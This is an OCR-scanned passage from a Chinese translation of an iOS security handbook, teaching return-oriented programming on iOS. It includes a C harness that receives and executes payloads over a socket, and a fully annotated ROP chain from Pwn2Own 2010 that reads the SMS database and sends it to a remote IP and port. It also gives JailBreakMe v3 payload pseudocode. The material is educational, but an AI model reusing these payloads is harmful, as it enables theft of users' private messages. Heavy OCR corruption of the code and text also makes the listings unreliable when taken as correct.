那个 寄存 器 的 内 容 原封 不 动 地 保留 下 来 , 我 们 就 可 能 要 找 一 个 语义 等 价 但 附加 效果 不 同 的 指令 片 
段 , 或 是 把 这 种 破坏 考虑 在 内 ,在 使 用 “执行 系统 调用 ”指令 片段 之 前 用 另 一 个 指令 片段 把 寄存 
器 的 内 容 保存 起 来 ， 并 在 系统 调用 之 后 还 原 其 内 容 。 

为 了 简化 这 个 过 程 ， 大 家 可 以 使 用 编译 器 。ROP 编 译 器 是 一 种 能 自动 连接 指令 片段 的 软件 ， 
而 且 它 会 把 用 到 的 每 个 指令 片段 的 附加 效果 都 考虑 在 内 。 要 实现 这 样 的 编译 器 , 最 常 使 用 的 一 种 
技术 就 是 SMT ( Satisfiability Modulo Theory， 可 满足 性 模 理论 )， 解 算 程序 会 为 每 个 可 用 的 指令 
片段 执行 一 项 操作 ， 并 了 验证 当前 的 指令 片段 能 否 证 实 之 前 的 指令 片段 链 的 条 件 。 

虽然 找 出 所 有 指令 片段 、 为 它们 加 上 附加 效果 的 注释 ,并 用 编译 器 创建 有 效 载荷 的 过 程 从 形 
式 上 是 正确 的 , 但 是 用 这 种 方式 创建 有 效 载荷 可 能 相当 费时 ,而 且 根 据 攻 击 者 的 需求 来 看 是 不 值 
得 去 做 的 。 出 于 这 些 原因 ， 有 人 提出 了 一 种 更 简单 的 方法 。 

如 果 二 进 制 文件 足够 大 , 可 以 容纳 用 于 执行 某 一 给 定 操 作 的 多 种 指令 片段 , 大 家 就 可 以 精心 
挑选 那些 尽 可 能 没有 附加 效果 的 指令 片段 , 这 样 一 来 在 将 它们 连接 起 来 时 就 不 需要 担心 可 能 带 来 
的 问题 。 一 旦 完成 了 这 些 工作 , 大 家 就 可 以 利用 自己 喜欢 的 程序 设计 语言 为 这 些 指令 片段 编写 一 
个 简单 的 包装 ， 并 利用 它 构 建 有 效 载荷 。 

comex 为 ARM 编 写 的 Saffron ROP 有 效 载 荷 和 Dino Dai Zovi 为 x86 编 写 的 DISC 是 这 种 方法 的 两 
个 绝 佳 例子 。 为 了 让 大 家 理解 这 种 思路 是 如 何 用 于 实践 的 , 我 们 首先 来 看 看 Saffron 中 用 来 从 某 个 
地 址 加 载 Ro 的 Python 函数 : 

def load_r0_from(address): 


gadget (R4=address, PC=('+ 20 68 90 bd', '- 00 00 94 e5 90 80 bd e8'), a='R4, RY7, 
PC 
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这 个 函数 的 工作 就 是 搜索 可 用 的 指令 片段 源 ， 查 找 其 中 的 某 个 双 字 节 序 列 。 第 一 个 是 Thumb 
模式 下 的 20 68 90 db， 对 应 如 下 指令 : 








6820 ldr r0, [r4, #0] 

bqd90 pop {4 7 Be} 
而 第 二 个 序列 则 在 ARM 模 式 下 ， 对 应 : 

e5940000 ldr EQ: 工业 不] 


e8bdq8090 lqdmia sp!, {r4, r7, pce} 

这 种 方法 显然 有 些 缺 点 。 事实 上 , 一 般 来 说 可 用 来 执行 相同 操作 的 不 同 指令 序列 可 能 数 不 胜 
数 。 因 此 ,如 果 忘 记 了 茶 种 有 效 的 二 进 制 模式 ， 你 就 有 可 能 错误 地 假设 在 给 定 可 用 的 指令 片段 时 
不 可 能 执行 某 一 操作 。 

男 一 方面 , 编写 这 样 的 工具 要 比 使 用 SMT 解 算 程 序 的 方式 快 得 多 , 而 且 在 有 某 个 巨大 的 库 或 
一 组 库 可 用 的 情况 下 ， 攻 击 者 基本 上 只 需要 编写 这 种 工具 就 行 了 。 在 iOS 中 ， 如 果 有 办 法 泄露 
dyld_shared_cache 中 某 个 库 的 地 址 ,你 就 等 于 是 拿 到 了 整个 缓存 ,， 它 大 约 有 200 MB 大 小 ， 基 
本 上 包含 了 可 能 用 到 的 所 有 指令 片段 。 


8.3 ”在 iOS 中 使 用 ROP 


iOS 为 设备 上 出 现 的 所 有 应 用 程序 使 用 了 代码 签名 。 我 们 可 以 将 代码 签名 视 作 类 DEP 对 策 的 
增强 版 。 事实 上 ， 大 多 数 操作 系统 中 即便 启用 了 这 些 保 护 机 制 , 还 是 可 能 有 办 法 分 配 可 写 、 可 读 
且 可 执行 的 内 存 页 。 这 样 一 来 就 有 了 击败 这 种 防御 对 策 的 方法 ， 出 于 这 一 原因 ， 大 部 分 的 ROP 
shellcode 代 码 都 是 非常 简单 的 代码 片段 ， 其 目的 是 禁用 “ 非 可 执行 ”保护 ， 然 后 充当 通 向 标准 
shellcode 代 码 的 枢纽 。 

遗憾 的 是 ， 这 种 做 法 在 iOS 上 行 不 通 ， 因 为 目前 为 止 还 没有 出 现 从 用 户 空间 禁用 代码 签名 的 
方法 。 因 此 攻击 者 只 剩 下 3 种 选择 了 。 

第 一 种 是 用 ROP 写 入 整个 有 效 载 谷 ,在 本 章 后 面 的 内 容 中 大 家 会 看 到 这 类 有 效 载 集 的 一 个 现 
实 示例 。 

第 二 种 选择 是 利用 ROP 把 两 个 不 同 的 漏洞 攻击 程序 ( 对 于 内 核 而 言 其 中 一 个 是 远程 的 , 一 个 
是 本 地 的 ) 连接 起 来 。 通过 完成 这 一 工作 ,攻击 者 可 以 绕 过 用 户 空间 的 代码 签名 ,并 在 内 核 空间 
或 者 用 户 空间 执行 普通 的 有 效 载荷 。 本 章 最 后 会 展示 一 个 利用 了 这 种 结合 的 著名 案例 。 

最 后 ， 如 果 漏 洞 攻 击 程序 有 瞄准 的 是 新 版 的 MobileSafari ， 那 么 ROP 有 效 载荷 可 以 向 为 JIT 代 码 
保留 的 内 存 页 面 写 人 标准 有 效 载荷 。 其 实 , 为 了 给 浏览 需 的 执行 提速 ,多数 JavaScript3 引 | 擎 都 引入 
了 要 求 内 存 页 可 读 、 可 写 而 且 可 执行 的 即时 编译 技术 (要 了 解 更 多 与 OS 上 的 即时 编译 有 关 的 信 
息 ， 请 参考 第 4 章 )。 


对 ROP 有 效 载荷 的 测试 
现在 已 经 很 明确 了 ， 写 入 和 测试 ROP 有 效 载荷 是 一 个 相当 漫长 和 烦 下 的 过 程 。 更 其 者 ,未 越 
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狱 的 设备 上 不 能 调试 应 用 程序 。 这 意味 着 ， 想 要 在 未 越狱 的 了 Phone 上 对 ( 例如， 针对 MobileSafari 
的 ) 漏洞 攻击 程序 进行 测试 ， 唯 一 的 方法 就 是 查看 通过 iTunes 获 得 的 崩 演 报告 。 

通过 ROP 有 效 载荷 本 身 对 ROP 有 效 载荷 进行 测试 已 经 很 棘手 了 , 媚 论 唯一 的 调试 手段 只 有 崩 
溃 报 告 。 为 了 缓解 这 一 问题 并 给 予 一 定 的 调试 能 力 ， 我 们 亟 需 一 种 能 对 shellcode 的 功能 进行 验证 
的 测试 程序 。 

下 面 的 测试 工具 非常 简单 。 大 家 要 创建 一 个 接收 有 效 载荷 并 执行 它 的 服务 器 , 核心 部 件 如 下 
所 示 : 


void restoreStack() 








{ 
_asm _ volatile ("mov sp, %0\t\n" 
"mov pc, %1" 
:"r"(stack pointer), "r"(ip + 0x14) 
) 
/ /警告 : 如 果 向 read_angd_exec 添 加 了 代码 ， 就 必须 重新 计算 “ip + 0x14” 
下 


int read and exec (int s) 


int n, length; 
unsigned int restoreStackAddr = &restoreStack; 


fprintf(stderr, "Reading length... "); 


( 
If ((n = recv(s, &length, sizeof(length), 0)) != sizeof(length)) { 
tfE “(rm < 0) 
perror ("recv"); 
else { 
fprintf(stderr, "recv: Short read\n"); 
return -1; 
} 
} 


fprintf(stderr, "%d\n", length); 
void *payload = malloc(length +1); 
if (payload == NULL) 
perror("Unable to allocate the buffer\n"); 


fprintf(stderr, "Sending address of restoreStack function\n"); 


if(send(s, &restoreStackAddr, sizeof (unsigned int), 0) == -1) 
perror("Unable to send the restoreStack function address"); 


fprintf(stderr, "Reading payload... "); 
if ((n = recv(s, payload, length, 0)) != length) { 
EE (mn < 0) 
perror("recv");} 
else { 


fprintf(stderr, "recv: Short read\n"); 
return -1; 
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_asm _ volatile _ ("mov %1, pc\n\t" 
"mov %0, sp\n\t" 
T= (tack poLlnter) ; "="(LD) 
J) 
_asm _ volatile _ ("mov sp, %0\n\t" 


nny 二 交加 E11 Fad, FE3 FA, LD. FT6, Pes” 


re 
)s 
// 有 效 载荷 会 跳 转 回 这 里 
stack pointer = ip = 0; 
free(payload); 
return 0; 
} 
这 段 代码 的 关键 部 分 是 几 个 汇编 代码 片段 。read_and_exec 函 数 中 的 第 一 个 汇编 代码 片段 
会 在 执行 shellcode 代 码 前 把 该 函数 的 栈 指 针 和 指令 指针 存储 到 两 个 变量 中 ,这 样 应 用 程序 就 可 以 
在 执行 完 有 效 载荷 后 恢复 执行 ， 而 不 是 直接 骨 溃 。 
函数 中 的 第 二 个 汇编 代码 片段 有 效 地 运行 了 ROP 有 效 载荷 。 它 改变 了 栈 指针 , 使 栈 指 针 指 向 
含有 shellcode 代 码 的 堆 缓 冲 区 ， 然 后 会 从 shellcode 代 码 弹 出 若干 个 寄存 器 ， 其 中 包括 指令 指针 。 
至 此 ，ROP 有 效 载荷 已 经 在 运行 了 。 这 些 动作 通常 是 漏洞 攻击 程序 要 完成 的 工作 。 
zestoreStack 了 国 数 中 的 汇编 代码 片段 确保 readq_anq_exec 国 数 的 指令 指针 和 栈 指 针 在 执 
行 过 有 效 载荷 后 能 够 复原 ， 这 是 通过 把 restorestack 函 数 的 地 址 发 送 回 客户 端 实现 的 。 客 户 端 
的 Python 脚 本 会 将 该 函数 的 地 址 附加 在 有 效 载 信 末端 ， 这 样 一 来 ， 如 果 ROP 有 效 载 合 是 以 复位 指 
令 指针 结尾 的 话 ， 执 行 就 有 可 能 继续 下 去 。 
完整 源 代码 参见 本 书 配套 网 站 www.wiley.com/go/ioshackershandbook。 
在 对 有 效 载 荷 进行 测试 时 , 把 测试 应 用 程序 的 沙 盒 描述 文件 与 目标 应 用 程序 的 描述 文件 之 间 
的 差异 考虑 在 内 是 很 重要 的 。 一 般 来 说 , 大 家 可 以 预期 测试 应 用 程序 与 App Store 应 用 有 着 相同 的 
沙 盒 描述 文件 。( 要 了 解 更 多 与 沙 盒 描述 文件 有 关 的 信息 ， 请 参阅 第 5 章 。) 
遗憾 的 是 ， 对 于 大 多 数 的 系统 可 执行 文件 来 说 ,情况 并 非 如 此 。 事 实 上 ,它们 一 般 会 具有 
更 加 宽松 的 描述 文件 。 在 用 这 里 介绍 的 测试 工具 对 有 效 载 荷 进行 测试 时 ， 这 可 能 会 导致 函数 调 
用 失败 。 
最 后 ,只 要 ROP 指 令 片 段 来 源 于 系统 库 , 我 们 就 总 有 可 能 对 这 个 测试 工具 进行 调整 ,使 之 针 
对 特定 的 库 进行 链接 。 但 不 巧 的 是 ， 如 果 所 选择 的 指令 片段 位 于 主 二 进 制 文件 中 , 我们 就 不 可 能 
利用 这 种 方法 对 其 进行 调试 了 。 
















































































8.4 ”iOS 中 ROP shellcode 的 示例 


在 本 节 中 ， 我 们 会 展示 并 注解 1OS 中 ROP shellcode 的 两 个 典型 示例 。 
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第 一 个 有 效 载荷 是 在 2010 年 的 Pwn2Own 大 赛 中 用 来 盗 取 SMS 数 据 库 内 容 的 ， 是 个 纯 ROP 
shellcode 的 好 例子 。 

第 二 个 有 效 载荷 是 jailbreakme.com 第 三 版 漏洞 攻击 程序 的 一 部 分 ， 适 用 于 4.3.4 之 前 的 iOS 。 
对 于 如 何 最 小 化 ROP 有 效 载荷 并 将 其 用 作 触 发 内 核 漏洞 的 枢纽 来 说 ， 这 是 个 不 错 的 例子 。 


8.4.1 用 于 盗 取 文件 内 容 的 有 效 载荷 


该 有 效 载荷 基于 来 自 iPhone 3GS 上 iOS 3.1.3 的 二 进 制 文件 ， 首 先 会 获取 栈 指针 与 若干 其 他 寄 
存 器 的 控制 权 。 其 实 ， 在 这 段 sShellcode 代 码 执行 之 初 , 受 攻 击 者 控制 的 寄存 器 就 只 有 R0， 它 指向 
一 个 40 字 节 长 的 缓冲 区 : 

















// 3298d162 6a07 ldr r7, [x0; #32] 
// 3298d164 f8d0d028 ldr.w sp, [r0, #40] 
// 3298d168 6a40 ldr r0, [r0, #36] 
// 3298d16a 4700 bx ¥0 


得 知 R0 及 其 内 容 都 在 攻击 者 的 控制 之 下 ， 该 有 效 载 集 就 会 把 R7 置 为 指向 男 一 个 受 攻击 者 控 
制 的 伪装 成 栈 帧 的 位 置 。 栈 指针 会 指向 任意 的 内 存 , 因为 它 已 经 跨 过 了 受 攻击 者 控制 的 那 40 字 节 ， 
因此 攻击 者 需要 另外 的 指令 片段 以 正确 设置 该 指针 。 

这 可 以 通过 存储 地 址 0x328c23ee 到 最 后 一 条 指令 中 调用 过 的 RO 来 实现 。 第 二 个 指令 片段 如 
下 所 示 : 








// 328c23ee fla70d00 sub.w sp, r7, #0 
// 328c23£2 bd80 pop {£7, Pe} 
A 


这 可 以 有 效 地 把 R7 的 内 容 移动 到 栈 指针 中 , 并 因此 把 栈 置 于 受 攻击 者 控制 的 位 置 。 从 这 里 开 
始 ， 指 令 指 针 被 从 攻击 者 提供 的 ROP 有 效 载荷 中 取 回 。 

该 有 效 载荷 的 其 余部 分 会 执行 以 下 操作 ， 它 是 用 C 语 言 伪 代码 表示 的 : 

AudioServicesPlaySystemSound (0xffff) 

int fd = open("/private/var/mobile/Library/SMS/sms.db", O_RDONLY); 


int sock = socket (PF_INET, SOCK_STREAM, 0); 
struct sockaddr address; 











connect (sock, address, sizeof (address)); 

struct stat buf; 

stat("/private/var/mobile/Library/SMS/sms.db", &buf); 

void *file = mmap(0, buf.st_ size, PROT READ, MAP_PRIVATE, fd, 0); 
write(sock, file, buf.st_ size); 

sleep(1); 

将 (0 


第 一 行 的 调用 严格 来 说 与 有 效 载荷 本 身 关系 不 大 ， 它 其 实 只 是 用 来 使 手机 振动 以 进行 调试 。 
从 那里 开始 , SMS 数 据 库 和 套 接 字 都 被 打开 了 。 然后 , 为 了 获取 文件 的 大 小 , 其 中 调用 了 stat ()。 
为 了 能 发 送 该 文件 ， 我 们 要 利用 mmap () 在 内 存 中 对 其 进行 映射 。 接 着 该 文件 就 被 发 送 给 远 
程 服务 器 。 在 这 里 ,一些 有 趣 的 事 发 生 了 ,攻击 者 被 迫 在 关 闭 应 用 程序 前 调用 sleep () 。 这 是 必 
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要 的 ， 否 则 通 向 远程 服务 器 的 连接 可 能 在 整个 文件 发 送 完 之 前 就 关闭 了 。 

当然 , 程序 员 可 能 会 注意 到 ,发 送 文件 的 正确 方式 应 该 是 把 文件 分 成 很 多 块 ， 并 建立 循环 一 
块 接 一 块 地 发 送 ， 直 到 文件 末端 。 这 样 做 的 问题 一 如 8.2.3 节 中 提 到 的 ， 除非 使 用 ROP 编 译 器 ， 否 
则 用 ROP 编 写 循环 不 是 件 易 事 。 这 同时 也 就 表明 该 有 效 载荷 是 手工 编写 的 。 

在 观察 该 有 效 载 答 其 余部 分 之 前 ,大 家 需要 理解 ,在 这 个 具体 的 示例 中 ,攻击 者 知道 假 栈 指 
针 的 地 址 ， 因 此 很 容易 对 与 这 个 假 栈 指针 有 关 的 数据 结构 寻 址 ， 并 将 它们 存储 起 来 。 该 有 效 载荷 
以 及 相应 的 注释 如 下 列 代 码 所 示 。 这 里 是 从 stealFile rop 3 1 3 gs 图 数 中 第 34 行 
( 0x32986a41 ) 处 的 ROP 值 数组 指向 的 地 址 开始 执行 的 : 


function stealFile _rop 3 1 3 gs(sp) 
{ 






































Var ropvalues = Array (244); 
function sockaddr_in(ip, port) 





var a String.fromCharCode (0x210); // sin family=AF_INET, sin len=16 
var b String.fromCharCode(((ip[1]&255)<<8)+(ip[0]&255)); 
Var C = String.fromCharCode(((ip[3]&255)<<8)+(ip[2]&255)); 

p 

下 时 


var String.fromCharCode(((port >> 8) &0xff)+( (port&0xff)<<8)); 
var 11 = String.fromCharCode (0); 
下 和 生生 汪 过 “这 灶 生 和 
fil11 += fil11; 
return a+p+b+c + fill; 


2 


function encode ascii(str) 
{ 

Var i, a= 0; 

Var encoded = ""; 


for(i = 0; i < str.length; i++) { 
if (i&1) { 

encoded += String.fromCharCode((str.charCodeAt(i) << 8) + a); 
} else { 

a= str.charCodeAt ( 工 ) ; 

} 


return encoded + String.fromCharCode((i&1) ? a : 0); 


// 32 字 节 (30 字 节 ASCII 码 ，2 字 节 表 示 终 止 的 0) 

var name = encode ascii("/private/var/mobile/Library/SMS/sms.db"); 
// 16 字 节 

Var sockStruct = sockaddr in(Array(192,168,0,3), 9090); 

var i = 0; 


Var locSockStruct = sp + 4*244; 

Var locFD = sp + 4*244-4; 

Var locSock = locFD - 4; 

var locMappedFile = locSock -4; 

var locStat = locMappedFile - 108; 

Var locFilename = locSockStruct + 0x10; 
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ropvalues [i++] = 0x87654321; // 仿造 的 r7 
ropvalues [i++] 0x32986a41; // LR->PC (thumb 模 式 ) 
// 接 下 来 执行 的 块 : 设置 LR 


// 32986a40 e8bdq4080 pop a 
// 32986a44 b001 add sp, #4 
// 32986a46 4770 bx 1r 
ropvalues[i++] = 0x12345566; // 仿造 的 r7 


ropvalues[i++] = 0x32988673; // LR (thumb 模 式 ) 
ropvalues[i++] = 0x11223344; // 填充 ,通过 add sp，#4 跳 过 





// 接 下 来 执行 的 块 : 调用 单 参数 函数 
// 32988672 bd01 pop {r0, pc} 


ropvalues[i++] = Ox00000fff; // r0 
ropvalues[i++] = 0x30b663cd; // PC 
// 库 调 用 


// 0x30b663cc <AudioServicesPlaySystemSound> 
// AudioServicesPlaySystemSounds uses LR to return to 0x32988673 
// 32988672 bd01 pop {r0, pc} 


ropvalues[i++] Ox00000000; // r0 


ropvalues[i++] 0x32986a41; // PC 
// 接 下 来 执行 的 块 : 设置 LR 


// 32986a40 e8bd4080 pop CE EY 
// 32986a44 Ib001 add sp, #4 

// 32986a46 4770 bx 1r 
ropvalues[i++] = 0x12345566; // 仿造 的 r7 
ropvalues[i++] = 0x32988d5f; // LR (thumb 模 式 ) 





ropvalues[i++] = 0x12345687; // 填充 , 通过 adqd sp，#4 跳 过 


// 接 下 来 执行 的 块 : 载 入 RO~R3 
// 32988d5e bad0f -Pop {0 rl; 2; 3, pce} 


ropvalues [i++ locFilename; // r0 文 件 名 


0x00000000，; // rl1 O_RDONLY 
0x00000000 // 仿造 的 r2 
0xddddeeee; // 仿造 的 3 


= 0x32910d4b; // PE 


] 
ropvalues [i++] 
ropvalues [i++] 
] 
] 


ropvalues [i++ 


ropvalues [i++ 


// 接 下 来 执行 的 块 : 调用 open 
// 32910d4a e840f7b8 blx open 
// 32910d4e bd80 pop {r7, pc} 


ropvalues[i++] =0x33324444; yh A si! 
ropvalues[i++] =0x32987baf; // PC 
// 32987bae bd02 pop {rl, pc} 


ropvalues[i++] = locFD-8; //r1 指 向 FD 
ropvalues[i++] = 0x32943b5c; //PC 





图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 

















8.4 iOS 中 ROP shellcode 的 示例 199 
//32943b5c e5810008 str r0, [rl1, #8] 
//32943b60 e3a00001 mov r0, #1 ; 0x1 
//32943b64 e8bd80f£0 ldmia BB! EE EG 7 De} 
ropvalues[i++] = 0x00000000; // 填充 
ropvalues[i++] = 0x00000000; // 填充 
ropvalues[i++] = 0x12345687; 
ropvalues[i++] = 0x12345678; 
ropvalues[i++] = 0x32986a41; // PC 
//32986a40 e8bd4080 pop {r7, lr} 
//32986a44 b001 adqd SD， #4 
//32986a46 4770 bx 1r 
ropvalues[i++] = 0x12345566; // r7 
ropvalues[i++] = 0x32987baf; // LR 
ropvalues[i++] = 0x12345678; // 填充 
//32987bae bd02 pop {rl, pc} 
ropvalues[i++] = 0x33324444; // r7 
ropvalues[i++] = 0x32988d5f; // PC 
//32988d5e a0t nop TE0. El. E29, be} 
ropvalues[i++] = 0x00000002; // r0 域 
ropvalues[i++] = 0x00000001; // rl 类 型 
ropvalues[i++] = 0x00000000; // Ir2 协 议 
ropvalues[i++] = Oxddddeeee; 7 3 
ropvalues[i++] = 0x328el6dc; // 调用 套 接 字 
// 套 接 字 返 回 到 指向 32987bae 的 1r 
ropvalues[i++] = locSock-8; //rl 指 向 locSock 
ropvalues[i++] = 0x32943b5c; //PC 
//32943b5c e5810008 str r0, [rl1, #8] 
//32943b60 e3a00001 mov r0, #1; Ox1 
//32943b64 e8bd80f£0 ldmia BB {rd FES, Lo, EI. Be 
ropvalues[i++] = 0x00000000; 
ropvalues[i++] = 0x00000000; 
ropvalues[i++] = 0x12345687; 
ropvalues[i++] = 0x66554422; 
ropvalues[i++] = 0x32988d5f; // PC 
//32988d5e bdof ‘Bop {EO EL LL2, 3 De} 
ropvalues[i++] = locSock:; // r0 套 接 宁 
ropvalues[i++] = locSockStruct; // rl 结构 体 
ropvalues[i++] = 0x00000010; // z2 结 构 体 的 大 小 
ropvalues[i++] = 0xddddeeee; ZE3 
ropvalues[i++] = 0x328c4ac9; pA 
//328c4ac8 6800 ldr r0, [xr0, #0] 
//328c4aca bd80 pop {E7., De} 
ropvalues[i++]= 0x99886655; // Ir7 垃 圾 回收 
ropvalues[i++] = 0x328e9c30; // 调 用 connect 
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//connect 返 回 到 指向 32987bae 的 r7 

ropvalues[i++] = 0x00000000; //r1 
ropvalues[i++] = Ox32988d5f; // PC 
//32988d5e bd0f Pop {(r0, rl, r2; 3, Be) 
ropvalues[i++] = locFilename; // r0, fd 
ropvalues[i++] = locStat; // rl1，stat 结 构 体 
ropvalues[i++] = 0x00000000 
ropvalues[i++] = 0x00000000; 
ropvalues[i++] = 0x328c2a4c; // 调用 stat 








// Stat 返 回 到 指向 32987baf 的 1 


ropvalues 
ropvalues 
/ /328c7225 


ropvalues 
ropvalues 
ropvalues 
ropvalues 
ropvalues 
//32988d5e 


ropvalues[i++] = 





i++ 
i++ 
e 


i++ 
i++ 
i++ 
i++ 


i++ 


= 0xabababab; 
= 0xX328cC722C7 
8bd8330 lqdmia 


= Ox00000000; 
= 0x00000000; 
= 0x00000000; 
= 0x00000002; 
= 0x32988d5f; 
bdof pop {r0, 
locF. 





/EL 
/CC 
spl; {rd4, r5,; B68, 


r9, pc} 


//r4 将 成 为 mmap 的 地 址 

//r5 不 管 是 什么 都 行 

//r8 将 成 为 mmap 的 文件 长 度 

//r9 被 复制 到 r3 中 的 MAP_PRIVATI 

/EC 

FE | 
D- 36; 








[DD 


3 PE) 








// r0 will be the filedes for mmap 
ropvalues[i++] = locStat + 60; // rl 结构 体 stat 的 文件 大 小 
ropvalues[i++] = 0x00000001; // r2 PROT_READ 
ropvalues[i++] = 0x00000000; 

// Ir3 必 须 是 有 效 地 址 ， 但 我 们 不 关心 它 到 底 是 什么 地 址 
ropvalues[i++] = 0x32979837; 

//32979836 6a43 ldr r3, [r0, #36] 
//32979838 6a00 ldr r0, [r0, #32] 
//3297983a 4418 add 0 ¥3 
//3297983c bd80 pop {r7 Pe 
ropvalues[i++] = sp + 73*4 + 0x10; //r7 不 管 是 什么 都 行 
ropvalues[i++] = 0x32988673; 
//32988672 bd01 pop {r0, pc} 
ropvalues[i++] = sp - 28; //r0 必 须 是 一 块 我 们 不 关心 的 内 存 
ropvalues[i++] = 0x329253eb; 
//329253ea 6809 ldr rl, [r1l, #0] 
//329253ec 61c1 St rl, [r0, #28] 
//329253ee 2000 movs r0, #0 
//329253f0 bd80 pop {r7, pc} 

ropvalues[i++] = sp + 75*4 + Oxc; //r7 
ropvalues[i++] = 0x328C5CBd; 
//328C5CBC STR R3, [SP,#0x24+var_24] 
//328C5CBE MOV R3, R9 
/X328C5CC0 STR R4, [SP,#0x24+var_20] 
//328C5CC2 STR R5, [SP,#0x24+var_1C] 
//328C5CC4 BLX _ mmap 
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328C5CC8 T1008 328C5CC8 ; CODE XREF: _mmap+50j 

/328C5CC8 SUB.W SP, R7, #0x10 

//328C5CCC LDR.W  R8, [SP+0x24+var 24],#4 

//328C5CD0 POP {R4-R7, PC} 

ropvalues[i++] = 0xbbccddee;// 我 们 需要 对 之 前 已 经 存储 在 栈 中 的 内 容 进行 一 些 填 充 
ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x32987baf; 


//32987bae bd02 pop {rl1l, pc} 


ropvalues[i++] = locMappedFile -8; 
// I1 指 向 映射 到 内 存 中 的 文件 
ropvalues[i++] = 0x32943b5c; // PC 


//32943b5c e5810008 str 0 [ 谋 汪 ;， 井 8] 
//32943b60 e3a00001 mov r0, #1 ; Oxl1 
//32943b64 e8bd80f0 ldmia sp!, {r4, r5, r6, Ir7, pc} 


ropvalues[i++] = sp; // 将 被 重 写 
ropvalues[i++] = 0x00000000 
ropvalues[i++] = 0x12345687; 
ropvalues[i++] = 0x12345678; 
ropvalues[i++] = 0x32988d5f; // PC 


//32988d5e bq0 ,fpeop” {£0 EL; E22 E33 pe} 


ropvalues[i++] = Sp -28; // r0 在 载 入 rl 时 被 重 写 
ropvalues[i++] = locMappedFile; // rl 不 管 是 什么 都 行 
ropvalues[i++] = 0x00000000; // r2 梢 后 被 放 入 
ropvalues[i++] = locStat + 60; // 梢 后 用 于 将 内 容 载 入 2 











ropvalues[i++] = 0x3298d351; 

//3298d350 681a ldr r2, [r3, #0] 

/A3298d352 6022 str r2, [r4, #0] 

//3298d354 601c ea r4, [r3, #0] 

/X3298d356 bdb0 pop {¥4, 5,; EE7; pe} 
ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x00000000; 

ropvalues[i++] = 0x329253eb; 

//329253ea 6809 ldr rl, [rl1, #0] 

//329253ec 61c1 str rl, [r0, #28] 

//329253ee 2000 movs r0, #0 

//329253£0 bdq80 pop {£7 BE} 

ropvalues[i++] = 0x11223344; 

ropvalues[i++] = 0x32988673 

//32988672 bqd01 pop {r0, pc} 

ropvalues[i++] = locSock; 

ropvalues[i++] = 0x328c4ac9; 

//328c4ac8 6800 ldr r0, [r0, #0] 

//328c4aca bqd80 pop {E77 DG} 
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ropvalues[i++] = 0x88776655; // YY7 二 圾 回收 
ropvalues[i++] = 0x32986a41; // PC 
//32986a40 e8bd4080 pop {ET LE} 
//32986a44 Ib001 add sp,， #4 
//32986a46 4770 bx 1r 


ropvalues[i++]=0x12345566; // r7 
ropvalues[i++]=0x3298d3ab; // LR 
ropvalues[i++]=0x12345678; // 填充 
//3298d3aa bd00 pop {pc} 

ropvalues[i++] = 0x328e456c; // 调用 write 





// Write 返 回 到 指向 0x3298d3ab 的 1r 


ropvalues[i++] = 0x32988673; 
/1 32988672 bqd01 pop {r0, pc} 
ropvalues[i++] = 0x00000001; 
ropvalues[i++] = 0x328fa335; // 调 用 sleep(); 


// Sleep 返回 到 指向 0x3298dq3ab 的 1 





ropvalues[i++] = 0x32988673 ; 

// 32988672 bad01 pop {r0; Be} 
ropvalues[i++] = locFD; // r0 fd 
ropvalues[i++] = 0x328c4ac9; // 

//328c4ac8 6800 ldr r0, [r0, #0] 
//328c4aca pbd80 pop {EL Be} 
ropvalues [i++ Oxccccdddad; 


ropvalues [i++ 0x328c8d74; // 调用 close() 
// close 返 回 到 指向 0x3298d3ab 的 1]r 








ropvalues[i++] = 0x328e469d; // call exit() 


8.4.2 ”利用 ROP 结 合 两 种 漏洞 攻击 程序 (JailBreakMe v3) 


正如 我 们 在 第 7 章 中 曾 简 要 介绍 过 的 ， 由 comex 编 写 的 JailBreakMe v3 0 漏洞 攻 
击 程序 是 已 PE en 此 处 不 会 详细 介绍 这 个 漏洞 攻击 
程序 ， 不 过 为 了 理解 它 的 ROP 有 效 载荷 ， 我 们 会 考虑 其 中 一 个 重要 的 细节 。 

从 iOS 4.3 起 ， 蔷 果 公 司 引入 了 ASLR， 也 就 是 地 址 空间 布局 随机 化 机 制 ， 因 此 任何 想 要 利用 
ROP 的 漏洞 攻击 程序 都 需要 找到 模块 的 基 址 (base address )。Saffron 利 用 某 次 信息 泄密 确定 了 存 
储 着 所 有 库 文件 的 daylg_sharegd_cache 的 基 址 。 一 旦 基 址 泄露 ，Saffron 就 可 以 根据 它 重新 定位 
整个 ROP 有 效 载荷 。 

Saffron 利 用 了 PDF 阅 读 器 中 存在 的 漏洞 ， 因 此 整个 有 效 载 荷 都 是 用 Tl 语言 编写 的 。 字 体 文件 
中 包含 了 许多 例 程 ， 其 中 有 一 些 对 于 理解 ROP 有 效 载 答 的 工作 原理 而 言 非常 有 用 。 

大 家 可 以 在 http://esec-lab.sogeti.com/post/Analysis-of-the-jailbreakme-v3-font-exploit 处 详细 了 
解 这 个 漏洞 攻击 程序 ， 而 我 们 在 这 里 只 关注 与 本 章 主题 有 关 的 部 分 。 根 据 iPhone 的 具体 型 号 ， 负 
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责 将 有 效 载荷 写 入 内存 的 两 个 例 程 是 例 程 8 和 和 例 程 9。 这 里 还 用 到 了 若干 个 辅助 例 程 : 
口 例 程 4、 例 程 5 和 例 程 7 把 值 压 人 栈 中 ， 其 中 考虑 了 ASLR 产 生 的 影响 ; 
口 例 程 6 会 把 一 个 双 字 加 到 漏洞 攻击 阶段 得 到 的 栈 偏 移 量 上 ; 
口 例 程 20 和 例 程 21 用 于 加 减 压 人 栈 的 值 ; 
口 例 程 24 把 压 和 人 栈 的 值 保存 到 受 攻 击 者 控制 的 位 置 ; 
口 例 程 25 会 向 栈 中 压 入 存储 在 受 攻击 者 控制 的 位 置 的 地 址 。 
在 了 解 这 些 信息 后 ， 现 在 来 看 这 些 shellcode 代 码 是 做 什么 的 。 用 户 空间 中 的 ROP 有 效 载荷 大 
致 会 执行 如 下 用 C 语 言 伪 代码 表示 的 操作 : 


mach port_t self = mach task_ self(); 

mlock(addr, 0x4a0); 

match = IOServiceMatching ("AppleRGBOUT"); 

IOKitwaitQuiet (0, 0); 

amatch = IOServiceGetMatchingService(0, match); 
IOServiceOpen(amatch, self, 0, &connect); 
IOConnectCallScalarMethod(connect, 21, callback, 2, 0, 0); 
